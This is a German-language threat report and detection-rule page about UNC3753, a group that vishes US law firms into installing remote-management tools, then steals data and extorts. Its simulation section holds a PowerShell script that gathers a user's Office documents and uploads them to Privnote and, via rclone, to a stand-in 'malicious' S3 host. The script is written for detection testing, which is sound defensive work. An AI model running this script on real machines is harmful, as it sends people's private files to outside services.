Rechtsbeistand suchen: Fortdauernde gezielte Angriffe auf US-Anwaltskanzleien
Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Ein finanziell motivierter Bedrohungscluster, der als UNC3753 verfolgt wird, führt Vishing-Kampagnen durch, die Opfer dazu verleiten, Fernüberwachungs- und -verwaltungssoftware zu installieren. Sobald der Zugang hergestellt ist, stehlen die Akteure sensible rechtliche und finanzielle Informationen und erpressen dann die betroffene Organisation, indem sie mit öffentlicher Bloßstellung drohen. Die Kampagne konzentriert sich auf professionelle Dienstleistungsunternehmen in den USA, insbesondere Anwaltskanzleien, und kann sowohl cyber-gestützten als auch physischen Datendiebstahl beinhalten.
Untersuchung
Mandiant beobachtete den kompletten Eindringzyklus, von dem anfänglichen Voice-Phishing-Anruf bis hin zu Datendiebstahl und Erpressung, manchmal innerhalb eines einzigen Geschäftstages. Opfer wurden überzeugt, Bildschirmfreigabe-Tools und RMM-Software wie AnyDesk, Bomgar oder einen benutzerdefinierten SuperOps-Installer zu nutzen, der mit einem curl Befehl geliefert wurde. Die Datenexfiltration wurde mit Tools wie WinSCP, Rclone oder direktem Hochladen zu Konsumenten-Cloud-Speicherkonten durchgeführt.
Minderung
Organisationen sollten Mitarbeiter schulen, Vishing-Versuche zu erkennen, strikte Verifizierungsverfahren für jede Remote-Support-Anfrage durchsetzen und unbefugte RMM- und Bildschirmfreigabetools blockieren. Das Deaktivieren von Wechseldatenträgern, die Überwachung ungewöhnlicher ausgehender Übertragungen zu Cloud-Speichern oder FTP-Zielen, die Anwendung bedingter Zugriffskontrollen auf VDI und die Durchsetzung von MFA auf kritischen Dokumenten-Repositories können das Risiko weiter reduzieren.
Antwort
Wenn diese Aktivität erkannt wird, isolieren Sie den betroffenen Endpunkt sofort, beenden Sie alle unbefugten Remote-Sitzungen und entfernen Sie installierte RMM-Binärdateien. Ermittler sollten die Kommandozeilen-Historie, Registry-Änderungen und geplante Task-Artefakte für die forensische Überprüfung sammeln. Kompromittierte Anmeldedaten sollten zurückgesetzt, die Datenexfiltration bewertet und die Einbindung der Strafverfolgungsbehörden in Betracht gezogen werden, wenn mit der Erpressung begonnen wurde.
"graph TB %% Klassendefinitionen classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Knotendefinitionen initial_access["<b>Aktion</b> – <b>T1566.004 Phishing: Spearphishing Voice</b><br/><b>Beschreibung</b>: Angreifer verwendet einen überzeugenden Sprachanruf, um das Ziel dazu zu bringen, Anmeldedaten bereitzustellen oder bösartige Befehle auszuführen."] class initial_access action user_execution["<b>Aktion</b> – <b>T1204.002 Bösartige Datei</b><br/><b>Tool</b>: cURL + MSI-Installer<br/><b>Beschreibung</b>: Ein Opfer führt eine bösartige MSI-Datei aus, die über cURL heruntergeladen wurde, was zu einer Codeausführung auf dem System führt."] class user_execution action remote_desktop["<b>Aktion</b> – <b>T1219.002 Remote Desktop Software</b><br/><b>Tools</b>: Zoom, Microsoft Teams, AnyDesk<br/><b>Beschreibung</b>: Legitime Remote-Desktop- oder Meeting-Anwendungen werden missbraucht, um einen persistenteren Remote-Zugriff zu erhalten."] class remote_desktop action discovery["<b>Aktion</b> – <b>T1083 Dateiverzeichnis-Entdeckung</b> & <b>T1680 Lokale Speicherort-Entdeckung</b><br/><b>Beschreibung</b>: Der Gegner durchsucht Dateien, Verzeichnisse und lokale Speichereinstellungen, um wertvolle Daten zur Exfiltration zu identifizieren."] class discovery action data_staging["<b>Aktion</b> – <b>T1074 Daten gestaged</b> & <b>T1560 Archivierte Daten</b><br/><b>Beschreibung</b>: Gesammelte Dateien werden lokal gesammelt und in Archive komprimiert, um sich auf die Exfiltration vorzubereiten."] class data_staging action exfiltration["<b>Aktion</b> – <b>T1567.002 Exfiltration zum Cloud-Speicher</b> & <b>T1020 Automatisierte Exfiltration</b><br/><b>Ziel</b>: Google Drive<br/><b>Beschreibung</b>: Automatisierter Upload der archivierten Daten zu einem Cloud-Speicherdienst zur Fernextraktion."] class exfiltration action physical_media["<b>Aktion</b> – <b>T1052 Exfiltration über ein physisches Medium</b><br/><b>Beschreibung</b>: Übertragung von Daten auf entfernbares Medium zur Offline-Exfiltration, wenn Netze beschränkt sind."] class physical_media action cleanup["<b>Aktion</b> – <b>T1070.001 Windows-Ereignisprotokolle löschen</b><br/><b>Beschreibung</b>: Löschen von Windows-Ereignisprotokollen, um Hinweise auf den Einbruch zu verbergen."] class cleanup action %% Kantenverbindungen initial_access –>|führt zu| user_execution user_execution –>|ermöglicht| remote_desktop remote_desktop –>|ermöglicht| discovery discovery –>|führt zu| data_staging data_staging –>|ermöglicht| exfiltration exfiltration –>|führt zu| physical_media physical_media –>|gefolgt von| cleanup "
Angriffsfluss
Erkennungen
Alternative Remote-Zugangs-/Managementsoftware (via Prozess-Erstellung)
Ansehen
Verdächtige CURL Verwendung (via cmdline)
Ansehen
Möglicher Versuch der SuperOps RMM-Softwareinstallation (via Datei-Ereignis)
Ansehen
Alternative Remote-Zugangs-/Managementsoftware (via System)
Ansehen
Alternative Remote-Zugangs-/Managementsoftware (via Audit)
Ansehen
Möglicher RMM-Softwareinstallationsversuch mit MsiInstaller (via Anwendungsprotokolle)
Ansehen
IOCs (SourceIP) zur Erkennung: Auf der Suche nach Rat: Fortlaufende zielgerichtete Kampagne gegen US-Anwaltskanzleien
Ansehen
IOCs (DestinationIP) zur Erkennung: Auf der Suche nach Rat: Fortlaufende zielgerichtete Kampagne gegen US-Anwaltskanzleien
Ansehen
Erkennung von unbefugtem Dateiaustausch und hohem SSH-Verkehrsaufkommen [Firewall]
Ansehen
UNC3753 Datenexfiltration unter Verwendung von Privnote und Dateiübertragungstools [Windows-Netzwerkverbindung]
Ansehen
UNC3753 Fernzugriff und bösartige MSI-Installation [Windows-Prozess-Erstellung]
Ansehen
Simulationsdurchführung
Voraussetzung: Die Telemetrie- & Baseline-Prüfung muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Methode (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darlegen, die die genaue Telemetrie generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu falschen Diagnosen.
-
Angriffs-Narrativ & Befehle:
-
Aufklärung & Datenstaging (T1005, T1083):
Der Gegner enumeriert Benutzerverzeichnisse und kopiert alle*.docxand*.xlsxDateien in einen Staging-OrdnerC:TempStagedData. -
Upload via Privnote (T1567.002):
Unter Verwendung von PowerShell liest der Angreifer jede Datei, kodiert den Inhalt in Base-64 und sendet ihn anhttps://privnote.com/api/note. Die Befehlszeile enthält die URL, was dieselection_privnoteBedingung erfüllt. -
Übertragung mit Rclone (T1020):
Der Angreifer führtrclone.exe(im Fluge heruntergeladen) aus, um die gestagten Dateien in einen bösartigen S3-Bucket zu verschieben. Der Prozessname „rclone.exe“ entsprichtselection_tool. -
Bereinigung: Löschen Sie den Staging-Ordner und alle verbleibenden Binärdateien.
-
-
Regressionstest-Skript: (PowerShell – eigenständig, keine externen Abhängigkeiten außer
Invoke-WebRequest.)# ------------------------------------------------- # UNC3753 Exfiltrationssimulation – PowerShell # ------------------------------------------------- # 1. Vorbereitung des Staging-Verzeichnisses $staging = "$env:USERPROFILETempStagedData" New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. Kopieren von Musterdaten (simuliert Datenerfassung) Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Hochladen jeder Datei zu Privnote (Web-Service Exfiltration) $privnoteUrl = "https://privnote.com/api/note" Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # Die URL erscheint in der Befehlszeile -> löst selection_privnote aus Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Laden Sie Rclone herunter (falls nicht vorhanden) und führen Sie die Exfiltration über S3 durch $rcloneExe = "$env:TEMPrclone.exe" if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip" Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force } # Konfigurieren Sie einen Remote (bösartigen) S3-Bucket – die Konfiguration wird in einer temporären Datei gespeichert $rcloneConfig = @" [malicious type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com "@ $configPath = "$env:TEMPrclone.conf" $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # Führen Sie rclone copy aus – Prozessname "rclone.exe" löst selection_tool aus & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO # 5. Bereinigung Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath -
Bereinigungskommandos:
# Beenden Sie alle verbleibenden WinSCP- oder Rclone-Prozesse Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # Löschen Sie alle verbleibenden temporären Dateien (falls vorhanden) Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue